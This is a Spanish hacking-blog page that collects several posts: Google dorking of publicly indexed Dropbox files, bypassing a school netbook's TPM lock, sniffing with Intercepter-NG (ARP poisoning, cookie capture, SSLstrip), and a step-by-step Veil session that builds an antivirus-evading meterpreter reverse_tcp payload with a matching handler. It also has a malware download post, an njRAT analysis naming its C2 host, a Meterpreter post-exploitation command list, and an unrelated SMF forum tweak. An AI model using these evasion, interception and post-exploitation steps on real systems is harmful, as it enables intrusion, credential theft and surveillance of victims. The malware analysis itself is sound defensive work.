Lo que se comparte por Dropbox al alcance de Google

10:14 0 Comments A+ a-


En varias ocasiones he hablado por aquí del problema que tienen las opciones de indexación de URLs tal y como se configuran el Google que pueden llevar a fugas de datos y problemas de privacidad. Ejemplos de esto os he puesto con Facebook, WhatsApp y con Gmail, pero el número de sitios que se ven afectados son infinitos, por lo que puedes pasarte una tarde divertida dorking as a ninja a ver qué sale.



Un amigo por Facebook - ¡Gracias Alan Brian! - en lugar de pedirme que hackeara cosas para él, me avisó de que en Dropbox sucede lo mismo y que el material que allí se puede encontrar es jugoso. Basta con irse a echar un ojo al fichero robots.txt de DropBox para ver que todos los archvios que se encuentren en los directorios /s y /sh están prohibidos para su indexación, pero sin embargo las direcciones URLs y los títulos de las mismas sí que van a quedar indexadas salvo que se introduzcan las etiquetas en el código HTML de NoIndex o se añada el X-Robots-Tag "NoIndex" a nivel de servidor web y Google los vea, algo para lo que no debería estar configurado el fichero robots.txt ya que si está el fichero robots.txt prohibiendo el acceso no verá las etiquetas. Incongruencia máxima de cómo funciona esto.




En Dropbox el número de URLs indexadas es de 1.570.000 sólo en el directorio /s, lo que deja para buscar y jugar largo rato haciendo hacking con buscadores. Hay algunas URLs filtradas con permisos de seguridad, archivos que ya no están, pero lo cierto es que la mayoría de esas URLs llevan a ficheros que sí que están y son accesibles, por lo que se puede sacar de todo.

Buscando así, al azar, aparecen ficheros con bases de datos de usuarios y contraseñas, archivos comprimidos con fotografías, código fuente de programas y aplicaciones, libros, música que se puede buscar como hacíamos en Skydrive, películas, y casi cualquier cosa que se te ocurra.



Entre las cosas que he sido capaz de localizar está la presentación completa del Codemotion ES que yo utilicé este año y que entregué a los organizadores, lo que me ha permitido recuperar completas todas las diapositivas de la charla que había perdido - larga vida al hacking -.

Cuidado con Google y el robot.txt

De todo ello, lo que más me ha maravillado es cómo se puede buscar en Google información prohibida por robots.txt. Veréis, yo he buscado por IBAN para ver si había gente que hubiera subido datos de cuentas corrientes a Dropbox, y me ha salido un resultado donde en el título se puede ver la palabra IBAN, aunque como está protegido por robots.txt no puedo ver ningún dato del resultado.




Cuando he ido a ver el sitio a ver qué se estaba compartiendo de forma pública se puede ver que hay una página con información de una cuenta bancaria, pero el texto IBAN solo aparece en el contenido del fichero PDF y no se encuentra en el título de la página, es decir, está solo en el texto de algún enlace a este documento.




Mirando el código fuente a ver otra de las palabras que aparece en el título que aparece en los resultados de búsqueda de Google, la palabra CODICE, se puede ver que tampoco está allí, por lo que parece más que evidente que Google está indexando la URL de ese documento PDF y deja buscar por términos asociados, como los del texto del enlace. Es decir, Google indexa en su base de datos el documento PDF, genera metadatos sobre el documento generados a partir el texto de algún enlace y deja buscar por ellos.




Además, parece que la gente de DropBox ha decidido que esto no debería estar así y en el código fuente se puede ver la etiqueta NoIndex para que Google no indexe nada del contenido de esa página web, pero Google no le ha hecho caso porque esta URL está prohibida por robots.txt y Google nunca leerá esa etiqueta y por tanto no le hará caso..




A los administradores de Dropbox les tocará darse un paseo por las Herramientas del Webmaster e ir borrando las URLs que ellos consideren una a una, para que no quede esto así. La otra alternativa sería borrar el robots.txt para que Google lea las etiquetas noindex. Curioso funcionamiento. Si compartes algo por Dropbox, revisa bien los permisos de seguridad y las cuentas a las que les das acceso, y ten presente que si Google accede de alguna forma a tu URL puede que aparezcan fugas de información en el título, los metadatos generados con el texto del enlace que se cree sobre el documento o la misma URL.

FUENTE | Chema Alonso

Desbloquear Netbook del gobierno CX 100nzc 2013

18:30 4 Comments A+ a-


Hola a todos,
Hace un tiempo hice un tutorial de como desbloquear las netbook del gobierno:

blog.underc0de.org/2013/10/desbloqueo-definitivo-de-la-netbook-del.html

Pero no sirve para todos los modelos, ahora voy a explicar como desbloquear la CX100, que es similar.

El metodo anterior consistia en hacer un puente entre los pines 21 y 22 mientras se encendia. Pero para este modelo, simplemente hay que soldarlos permanentemente:


Una vez hecho eso, armamos todo y ya tendremos la pc desbloqueada:


Espero que les sirva! Los creditos son para gomez___m

Desbloqueo de las Netbook del gobierno (2013-2014)

18:24 1 Comments A+ a-


He visto que muchos usuarios aun quieren desbloquear las netbooks del gobierno puenteando las patas del chip TPM. El metodo sigue vigente, pero SOLO para las netbooks del año 2011 - 2012 y algunas del 2013.

A partir del 2013, cambiaron el chip, dificultando asi su desbloqueo.
Investigando un poco en internet, me tope con esto:

Rompiendo el mito del desbloqueo ilegal:

se estima que un 10% de las primeras computadoras que se entregaron vinieron con fallas de fabrica y debido a este inconveniente se podian desbloquear temporalmente (no en su totalidad).

ministerio de educacion


En las nuevas computadoras se corrigio este error y tienen el doble de seguridad: se les agrego un interruptor DIP y se presume que otro chip alterno que controla la secuencia de arranque; lo que basicamente hace esta nueva seguridad implementada es que si alguien interrumpe el ciclo normal de arranque la pc tiende a autoapagarse mostrando una pantalla negra que no llega ni a encenderse.. 
La UNICA forma de desbloquear las netbooks ahora, es termiando el ultimo año del secundario. En caso de que encuentre alguna forma nueva para desbloquearlas, lo estaré posteando.

Intercepter-NG

17:30 2 Comments A+ a-

 Intercepter-NG nos permite capturar tráfico en nuestra red, analizarlo (emulando al gran Wireshark con muchísimas menos opciones), ver cookies o realizar ataques más complejos (SSLStrip).

La aplicación nos presenta un diseño por pestañas, para que, una vez escogidos nuestros objetivos, aprovechar las distintas funciones que ésta ofrece. Lo primero que haremos sera buscar en la red los equipos conectados, para ello pulsamos el "radar" que aparece en la parte superior izquierda y empezarán a aparecer los equipos de la red:


Una vez seleccionados los objetivos pulsamos en la flecha verde (izquierda superior derecha), con lo que ya estaremos en el menú de pestañas. Aquí se nos presentan las distintas opciones que nos ofrece la herramienta, la primera de ellas y necesaria para que el resto funcione es el Arp Poisoning (pulsando el botón play):

 

  Este nos mostrará las páginas a las que accede la víctima:


En la segunda pestaña (cuyo icono recuerda al de la herramienta Wireshark) obtenemos una visión del trafico similar a la del famoso sniffer:


La tercera posibilidad que se nos ofrece es el ver las cookies interceptadas:


  Por último nos muestra un panel de opciones donde podemos escoger funcionalidades añadidas como realizar un ataque de SSLstrip o salvar la captura en un archivo:


Y esto es todo, una aplicación interesante que nos permite llevar un completo sniffer en nuestros dispositivos.


Veil – Evasión de Antivirus

10:47 0 Comments A+ a-


Veil es una herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus. Utiliza métodos distintos para generar payloads diferentes y permite al usuario usar Pyinstaller o Py2Exe para convertir los payloads de Python a ejecutables.

Descarga Veil:
git clone https://github.com/ChrisTruncer/Veil
cd Veil
python Veil.py
root@stuxnet:/media/Stuxnet/Pentesting/veil# python Veil.py
 
=========================================================================
 Veil First Run Detected... Initializing Script Setup...
=========================================================================
 
 [*] Executing ./config/update.py...
 [>] Please enter the path of your metasploit installation: /media/Stuxnet/Pentesting/msf
 [*] OPERATING_SYSTEM = Linux
 [*] TERMINAL_CLEAR = clear
 [*] VEIL_PATH = /media/Stuxnet/Pentesting/veil/
 [*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/
 [*] Path '/root/veil-output/source/' Created
 [*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/
 [*] Path '/ro
ot/veil-output/compiled/' Created
 [*] TEMP_DIR = /tmp/
 [*] METASPLOIT_PATH = /media/Stuxnet/Pentesting/msf
 [*] PYINSTALLER_PATH = /opt/pyinstaller-2.0/
 [*] MSFVENOM_OPTIONS =
 [*] Configuration File Written To /media/Stuxnet/Pentesting/veil/config/settings.py
 
=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
 
 [!] WARNING: Official support for Kali Linux (x86) only at this time!
 [!] WARNING: Continue at your own risk!
 
 Main Menu
 
    18 payloads loaded
 
 Available commands:
 
    use             use a specific payload
    update          update Veil to the latest version
    list            list available languages/payloads
    info            information on a specific payload
    exit            exit Veil
 
 [>] Please enter a command: list
 
 
=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
 
 [!] WARNING: Official support for Kali Linux (x86) only at this time!
 [!] WARNING: Continue at your own risk!
 
 Available payloads:
 
    1)  c/VirtualAlloc                  Poor
    2)  c/VoidPointer                   Poor
 
    3)  c#/VirtualAlloc                 Poor
    4)  c#/b64SubVirtualAlloc           Normal
 
    5)  native/BackdoorFactory          Normal
    6)  native/hyperion                 Normal
    7)  native/pescrambler              Normal
 
    8)  powershell/DownloadVirtualAlloc     Excellent
    9)  powershell/PsexecVirtualAlloc       Excellent
    10) powershell/VirtualAlloc         Excellent
 
    11) python/AESEncrypted             Excellent
    12) python/ARCEncrypted             Excellent
    13) python/Base64Encode             Excellent
    14) python/DESEncrypted             Excellent
    15) python/FlatInjection            Normal
    16) python/LetterSubstitution       Excellent
    17) python/MeterHTTPContained       Excellent
    18) python/MeterHTTPSContained      Excellent
 
 [>] Please enter a command: 11
 
=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
 
Payload: python/AESEncrypted loaded
 
 Required Options:
 
 Name           Current Value   Description
 ----           -------------   -----------
 compile_to_exe     Y           Compile to an executable
 inject_method      virtual     [virtual]alloc or [void]pointer
 use_pyherion       N           Use the pyherion encrypter
 
 Available commands:
 
    set             set a specific option value
    info            show information about the payload
    help [crypters] show help menu for payload or crypters
    generate        generate payload
    exit            exit Veil
    back            go to the main menu
 
 [>] Please enter a command: generate
 
=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
 
[?] Use msfvenom or supply custom shellcode?
 
        1 - msfvenom (default)
        2 - Custom
 
 [>] Please enter the number of your choice: 1
 
 [*] Press [enter] for windows/meterpreter/reverse_tcp
 [*] Press [tab] to list available payloads
 [>] Please enter metasploit payload:
 [>] Enter value for 'LHOST', [tab] for local IP: xxx.xxx.xxx.xxx
 [>] Enter value for 'LPORT': 4444
 [>] Enter extra msfvenom options in OPTION=value syntax:
 
 [*] Generating shellcode...
 
=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
 
 [*] Press [enter] for 'payload'
 [>] Please enter the base name for output files:
 
 [?] How would you like to create your payload executable?
 
        1 - Pyinstaller (default)
        2 - Py2Exe
 
 [>] Please enter the number of your choice: 1
Seleccionamos la opción 1 y finalizamos. En este momento empieza a salir varios mensajes por consola mientras genera el ejecutable y finalmente, muestra un resumen de todo. En este se puede ver la ruta en la que ha dejado el resultado. Ahora abrimos Metasploit:
msf> use exploit/multi/handler
msf exploit(handler) > exploit


Anillos inteligentes: toda la información personal en un dedo

14:09 0 Comments A+ a-

El Smarty Ring es un proyecto en una web de financiamiento en masa que permite a los usuarios conectarlo al teléfono para recibir notificaciones, atender o declinar llamadas y hasta manejar la cámara del smartphone


Los accesorios inteligentes pisan cada vez más fuerte y extienden los límites de la tecnología más allá de lo que hasta no hace mucho no se creía viable.

Al lado de relojes inteligentes, como el SmartWatch de Sony, el Galaxy Gear de Samsung o el Pebble, el rubro de este tipo de dispositivos se fue extendiendo para abarcar nuevos territorios con nuevos proyectos.

Pelucas con GPS, ropa que funciona como batería recargable y hasta unas zapatillas que hablan fueron todos proyectos que, de alguna forma u otra, encararon en esta dirección, más allá de que lleguen o no a convertirse en una realidad de mercado masivo. En tanto, las gafas de Google, Glass, se acercan cada vez más a convertirse en un producto a la venta.

Ahora también se suma al segmento el Smarty Ring, un anillo inteligente cuya función principal se asemeja a la de los relojes inteligentes, ya que se utiliza conectado al smartphone para recibir notificaciones, tomar llamados, entre otros.


El proyecto del accesorio surgió el mes pasado en el sitio de financiamiento en masa Indiegogo y ya sobrepasó con creces su objetivo de recaudación, según apuntó el sitio The Verge. La campaña finaliza mañana.

De forma similar, hace algunos meses en Kickstarter, otra web de financiamiento en masa, se realizó una campaña para fabricar un anillo con NFC, que, según sus creadores, podrá ser utilizado para desbloquear puertas, teléfonos inteligentes y transferir información.

El Smarty Ring viene con una pequeña pantalla LED ubicada en parte del cuerpo de acero inoxidable quirúrgico hipoalergénico del anillo, cuya "simple elegancia" hace que el accesorio pueda ser utilizado tanto por hombres como por mujeres. Viene en distintos tamaños y tiene 13 milímetros de ancho y 4 milímetros de grosor.

El anillo viene con Bluetooth 4.0, mediante el cual se conecta al smartphone (es compatible con Android y iOS) de los usuarios para avisarle, en la pequeña pantalla, de la entrada de notificaciones, mensajes, mails, llamados y actualizaciones de redes sociales o servicios de mensajería. Según se explica en la web, su batería dura un día.

Asimismo, el Smarty Ring viene con unos pequeños botones, prácticamente sin relieve, ubicados fuera de la pantalla, que permiten manejar el teléfono a distancia, en caso, por ejemplo, de querer disparar la cámara o controlar la música que en él se reproduce.


Además, el dispositivo incorpora una función para ubicar el teléfono cuando el usuario lo ha perdido, mediante la cual hace sonar remotamente una alarma, aun cuando el smartphone esté en modo silencioso, que le permite ubicarlo (a partir de los 30 metros de distancia).

El anillo cuesta u$s175 para aquellos que colaboren tempranamente con la campaña en Indiegogo; en tanto, una vez que llegue a las tiendas, se venderá por u$s275 en los Estados Unidos.

Malware Data Base

21:02 0 Comments A+ a-


En la Base de datos de malwares encontraran todos los malwares disponibles y es actualizada diariamente. Todos los malwares han sido testeados, pero se recomienda usarlos bajo su propio riesgo.
Ni el Host, ni Underc0de, ni ninguno de sus administradores se hace cargo del mal uso que se le pueda dar al material expuesto.


Saludos a todos y disfruten!
Underc0de Team

ENYe-Spider v1.2

11:48 0 Comments A+ a-

 

 
Pepelux nos trae este programa para windows que analiza remotamente una web sacando la estructura de ficheros y directorios … vamos, lo que es un spider o web crawler.

Está diseñado para comprobar las vulnerabilidades de una web e incluye algunos extras: posibilidad de usar un servidor proxy, discrimina los ficheros que aceptan parámetros por GET o POST, permite escribir anotaciones sobre los escaneos, navegador web integrado y permite guardar los análisis en disco.

 
 

Análisis de Malware (Static Analysis) [Parte 1]

13:50 0 Comments A+ a-


"Análisis Estático" ¿Qué quiere decir?

Se trata de obtener  información  de  archivos (Malware's), pero sin ejecutar el mismo. Esto implica que en el análisis estático se utilizará algunas aplicaciones que permitan analizar el código del programa con el fin de obtener(el tipo de archivo, en que lenguaje y cuando se ha programado, librería que usa,..etc.).



Comencemos, hace poco me descarga un programa de un foro X: "TiGeR-Firewall-Setup.exe", me puse a revisar si no traía regalitos, así que para comenzar busque por la red,  si existe alguna web oficial o si es de algún autor que posteo en algún foro( esto puede significar mucho o nada al momento de analizar), encontré uno y me lo descargue, al observar los archivos, existía una diferencia de Tamaño en los archivos y al compararlos también la diferencia de Hash de los archivo.


    Archivo Sospechoso:
       
  • Nombre         =     TiGeR-Firewall-Setup.exe
  • Hash MD5    =     15903C8FAE011F2A7969525796F0E30A
  • Tamaño        =     2,89 MB

       
       
    Archivo Original:

  • Nombre         =     TiGeR-Firewall-Setup_o.exe
  • Hash MD5    =     E84762B1128B1E910E6D632FC88A732B
  • Tamaño        =     2,69 MB
           

HASH:Un hash es un valor de tamaño fijo obtenido como resultado de aplicar una función matemática (hash function) a un valor de entrada, obteniendo en teoría un resultado único para ese valor. De tal modo que si H(x) = H(y) entonces x=y.
"extraída de elixicorp".
Siguiendo con esto, ahora utilizaremos la siguiente herramienta:

"RDG Pack Detector" ¿Qué es?. Es un detector de packers,Cryptors,Compiladores, Packers Scrambler,Joiners,Installers.

Esto para ver en que lenguaje se hizo, también se puede observar la diferencia que hay entre los archivos.
 


 De aqui extraemos lo siguiente: Visual .Net, Múltiples protecciones, UPX, antidebuggers,...y ademas el archivo contiene un archivo adjunto, ahora extraeremos el archivo adjunto, para ello utilizaremos esta misma herramienta...



Cargamos el archivo extraído a  RDG Pack detector. y vemos lo siguiente:


 como podemos ver se ve otro archivo adjunto, podemos seguir extrayendo, hasta llegar con el programa original ya que según lo que se ve esta bindeado, pero a partir de este momento utilizaremos otra aplicación.
 "de4dot32" (de4dot es un Deobfuscator/ de código abierto escrito en C#  para .NET Reverse Engineering.)
 Vamos usarla, para que se vea claro, ya que si lo cargamos directamente en .Net Reflector o CodeReflector, al inter usarla usar, será ilegible gran parte del código y no sacaremos nada.




miramos otra vez desde RDG Pack Detector:


Nos muestra: Confuser 1.9...Ahora utilizaremos una herramienta más:
"ConfuserStringDecryptor1.0".



Ahora lo cargamos desde ".Net_CodeReflect"( .NETCodeReflect permite des compilar cualquiera. NET para C #, VB.NET o MSIL ), después de mirar casi todo,  encontramos algo interesante:


Encontramos lo siguiente:


  • "java.exe"
  • "TEMP"
  • "d2be3e6d11846430c067fc874a79f583"
  • "evilevil.no-ip.org"
  • "1177"
  • "True"


Y a partir de aquí se puede sacar  conclusiones.

Crear un archivo "java.exe" en el directorio Temporal ("TEMP") y conecta  a la direccion "evilevil.no-ip.org" a través del puerto "1177"
y que ademas tiene 2 opciones marcadas como "True" que supongo que debe ser: 1.-auto inicio + 2.-Protección BSOD, Generalmente  el puerto y el lenguaje(.NET) que viene aquí hace suponer que se trata de: "nJRAT"

Jaja o simplemente  eso(de: java.exe,temp,evilevil.no-ip.org)son solo textos incrustados en la aplicación.. para eso

Autor: Fudmario

Reemplazar el buscador del SMF por uno de Google

9:23 0 Comments A+ a-


Hola a todos, soy ANTRAX. En este tutorial voy a explicar cómo desactivar el buscador de los foros SMF para que el foro consuma menos recursos del servidor y reemplazarlo por uno que utilice los motores de búsqueda de google.
Comenzaremos entrando al FTP y nos dirigimos a la ruta  ./sources
Modificaremos el archivo Subs.php

Buscamos la linea 3910 que contiene lo siguiente:


'href' => $scripturl . '?action=search',

Y lo modificamos por la ruta en donde tendremos el buscador:

'href' => 'http://underc0de.net/buscador',

 Aprovechamos que estamos en la carpeta Sources y eliminamos estos 4 archivos: Search.php, SearchAPI-Custom.php, SearchAPI-Fulltext.php, SearchAPI-Standard.php


Ahora nos dirigimos a: . /Themes/default y buscamos el archivo index.templates.php

Buscamos la línea 142 y la borramos

Finalmente vamos a la ruta ./Themes/MI TEMA y modificaremos el archivo index.template.php

Buscamos y borramos la línea 147.

Ahora modificaremos el archivo index.php que se encuentra en el directorio principal del foro

Quitamos la línea 305 y 306

Una vez hecho todo esto, habremos eliminado por completo el buscador del SMF.

Ahora crearemos el nuevo buscador.
Nos dirigimos a: http://www.google.es/cse/manage/all y creamos un nuevo buscador
Llenamos todos los campos y damos click en Siguiente

Ahora pasamos a personalizar los colores, fuentes, etc.



Una vez finalizado, damos click en Siguiente y podremos ver el código de nuestro buscador.

Ahora abrimos el Notepad, colocamos lo siguiente


<html>
                <head>

CODIGO DEL BUSCADOR

                </head>
</html>

Lo guardamos con extension html y lo subimos a algún servidor.
Obviamente pueden cambiar el estilo de su buscador. Les muestro como quedo el mío:

Espero que les haya sido de utilidad!

Meterpreter de Metasploit

9:12 0 Comments A+ a-


Meterpreter es un Payload que se ejecuta después del proceso de explotación o abuso de una vulnerabilidad en un sistema operativo, meterpreter es el diminutivo para meta-interprete y se ejecuta completamente en memoria; evitando así tener problemas con los Antivirus.

Las características más importantes de este shellcode son:
1. Eliminación de archivos de Log.
2. Captura de pantalla.
3. Carga y descarga de archivos.
4. Copiar información.
5. Extracción de información de configuración

IDLETIME
Permite consultar el tiempo en el que el usuario de la maquina victima ha estado ausente.

SCREENSHOT
Permite extraer una imagen del escritorio remoto.

UICTL
Permite controlar algunos de los componentes del sistema afectado.

Password Database Commads

HASHDUMP
Permite consultar el contenido del la base de datos SAM en sistemas Windows.

BACKGROUND
Ejecuta la sesión actual en segundo plano para retornar a la línea de comandos de Meterpreter, para regresar a la sesión se ejecuta el comando tradicional (sessions –i 1).

MIGRATE
Permite migrarse a otro proceso en la maquina víctima.

File Systems Commands

LS
Permite visualizar los archivos en el directorio remoto actual.

DOWNLOAD
Permite descargar un archivo de la maquina atacada, es necesario hacer uso del back-slash doble en la ruta del mismo.

UPLOAD
Permite cargar un archivo en una ruta especifica, de la misma manera que el comando download es necesario hacer uso del doble slash al momento de indicar la ruta.

SEARCH
Permite buscar archivos en la maquina víctima, además:
1. Permite indicar el tipo de archivo.
2. Permite indicar la ruta donde se quiere realizar la búsqueda.

IPCONFIG
Permite visualizar todas la información de todas tarjetas de red existentes en la maquina atacada

ROUTE
Permite consultar y modificar la tabla de enrutamiento.

EXECUTE
Permite ejecutar un comando.

GETPRIVS
Permite obtener tantos privilegios de administración como sea posible.

GETUID
Permite consultar el tipo de usuario que la maquina victima esta ejecutando.

PS
Permite consultar todos los procesos que están en ejecución.

SHELL
Permite obtener un Shell, o línea de comando.

SYSINFO
Permite obtener información del sistema remoto como:

1. Nombre de la maquina.
2. Sistema Operativo.
3. Tipo de arquitectura.
4. Lenguaje del sistema operativo.

ENUMDESKTOPS
Permite consultar todas las sesiones (o escritorios).